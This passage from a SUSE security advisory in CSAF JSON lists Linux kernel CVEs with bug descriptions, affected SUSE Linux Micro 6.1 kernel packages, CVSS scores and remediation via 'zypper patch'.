Something similar occurs when we zero routing table\nentries for the modem.\n\nBy preventing any attempt to clear hashed tables when hashing is not\nsupported, the reference count underflow is avoided in this case.\n\nNote that there likely remains an issue with properly freeing unused\ntransactions (if they occur due to errors). This patch addresses\nonly the underflows that Google originally reported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54225",
"url": "https://www.suse.com/security/cve/CVE-2023-54225"
},
{
"category": "external",
"summary": "SUSE Bug 1256234 for CVE-2023-54225",
"url": "https://bugzilla.suse.com/1256234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54225"
},
{
"cve": "CVE-2023-54227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-mq: fix tags leak when shrink nr_hw_queues\n\nAlthough we don\u0027t need to realloc set-\u003etags[] when shrink nr_hw_queues,\nwe need to free them. Or these tags will be leaked.\n\nHow to reproduce:\n1. mount -t configfs configfs /mnt\n2. modprobe null_blk nr_devices=0 submit_queues=8\n3. mkdir /mnt/nullb/nullb0\n4. echo 1 \u003e /mnt/nullb/nullb0/power\n5. echo 4 \u003e /mnt/nullb/nullb0/submit_queues\n6. rmdir /mnt/nullb/nullb0\n\nIn step 4, will alloc 9 tags (8 submit queues and 1 poll queue), then\nin step 5, new_nr_hw_queues = 5 (4 submit queues and 1 poll queue).\nAt last in step 6, only these 5 tags are freed, the other 4 tags leaked.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54227",
"url": "https://www.suse.com/security/cve/CVE-2023-54227"
},
{
"category": "external",
"summary": "SUSE Bug 1255952 for CVE-2023-54227",
"url": "https://bugzilla.suse.com/1255952"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54227"
},
{
"cve": "CVE-2023-54229",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54229"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: fix registration of 6Ghz-only phy without the full channel range\n\nBecause of what seems to be a typo, a 6Ghz-only phy for which the BDF\ndoes not allow the 7115Mhz channel will fail to register:\n\n WARNING: CPU: 2 PID: 106 at net/wireless/core.c:907 wiphy_register+0x914/0x954\n Modules linked in: ath11k_pci sbsa_gwdt\n CPU: 2 PID: 106 Comm: kworker/u8:5 Not tainted 6.3.0-rc7-next-20230418-00549-g1e096a17625a-dirty #9\n Hardware name: Freebox V7R Board (DT)\n Workqueue: ath11k_qmi_driver_event ath11k_qmi_driver_event_work\n pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : wiphy_register+0x914/0x954\n lr : ieee80211_register_hw+0x67c/0xc10\n sp : ffffff800b123aa0\n x29: ffffff800b123aa0 x28: 0000000000000000 x27: 0000000000000000\n x26: 0000000000000000 x25: 0000000000000006 x24: ffffffc008d51418\n x23: ffffffc008cb0838 x22: ffffff80176c2460 x21: 0000000000000168\n x20: ffffff80176c0000 x19: ffffff80176c03e0 x18: 0000000000000014\n x17: 00000000cbef338c x16: 00000000d2a26f21 x15: 00000000ad6bb85f\n x14: 0000000000000020 x13: 0000000000000020 x12: 00000000ffffffbd\n x11: 0000000000000208 x10: 00000000fffffdf7 x9 : ffffffc009394718\n x8 : ffffff80176c0528 x7 : 000000007fffffff x6 : 0000000000000006\n x5 : 0000000000000005 x4 : ffffff800b304284 x3 : ffffff800b304284\n x2 : ffffff800b304d98 x1 : 0000000000000000 x0 : 0000000000000000\n Call trace:\n wiphy_register+0x914/0x954\n ieee80211_register_hw+0x67c/0xc10\n ath11k_mac_register+0x7c4/0xe10\n ath11k_core_qmi_firmware_ready+0x1f4/0x570\n ath11k_qmi_driver_event_work+0x198/0x590\n process_one_work+0x1b8/0x328\n worker_thread+0x6c/0x414\n kthread+0x100/0x104\n ret_from_fork+0x10/0x20\n ---[ end trace 0000000000000000 ]---\n ath11k_pci 0002:01:00.0: ieee80211 registration failed: -22\n ath11k_pci 0002:01:00.0: failed register the radio with mac80211: -22\n ath11k_pci 0002:01:00.0: failed to create pdev core: -22",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54229",
"url": "https://www.suse.com/security/cve/CVE-2023-54229"
},
{
"category": "external",
"summary": "SUSE Bug 1255924 for CVE-2023-54229",
"url": "https://bugzilla.suse.com/1255924"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54229"
},
{
"cve": "CVE-2023-54230",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54230"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namba: bus: fix refcount leak\n\ncommit 5de1540b7bc4 (\"drivers/amba: create devices from device tree\")\nincreases the refcount of of_node, but not releases it in\namba_device_release, so there is refcount leak. By using of_node_put\nto avoid refcount leak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54230",
"url": "https://www.suse.com/security/cve/CVE-2023-54230"
},
{
"category": "external",
"summary": "SUSE Bug 1255925 for CVE-2023-54230",
"url": "https://bugzilla.suse.com/1255925"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54230"
},
{
"cve": "CVE-2023-54235",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54235"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/DOE: Fix destroy_work_on_stack() race\n\nThe following debug object splat was observed in testing:\n\n ODEBUG: free active (active state 0) object: 0000000097d23782 object type: work_struct hint: doe_statemachine_work+0x0/0x510\n WARNING: CPU: 1 PID: 71 at lib/debugobjects.c:514 debug_print_object+0x7d/0xb0\n ...\n Workqueue: pci 0000:36:00.0 DOE [1 doe_statemachine_work\n RIP: 0010:debug_print_object+0x7d/0xb0\n ...\n Call Trace:\n ? debug_print_object+0x7d/0xb0\n ? __pfx_doe_statemachine_work+0x10/0x10\n debug_object_free.part.0+0x11b/0x150\n doe_statemachine_work+0x45e/0x510\n process_one_work+0x1d4/0x3c0\n\nThis occurs because destroy_work_on_stack() was called after signaling\nthe completion in the calling thread. This creates a race between\ndestroy_work_on_stack() and the task-\u003ework struct going out of scope in\npci_doe().\n\nSignal the work complete after destroying the work struct. This is safe\nbecause signal_task_complete() is the final thing the work item does and\nthe workqueue code is careful not to access the work struct after.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54235",
"url": "https://www.suse.com/security/cve/CVE-2023-54235"
},
{
"category": "external",
"summary": "SUSE Bug 1255921 for CVE-2023-54235",
"url": "https://bugzilla.suse.com/1255921"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
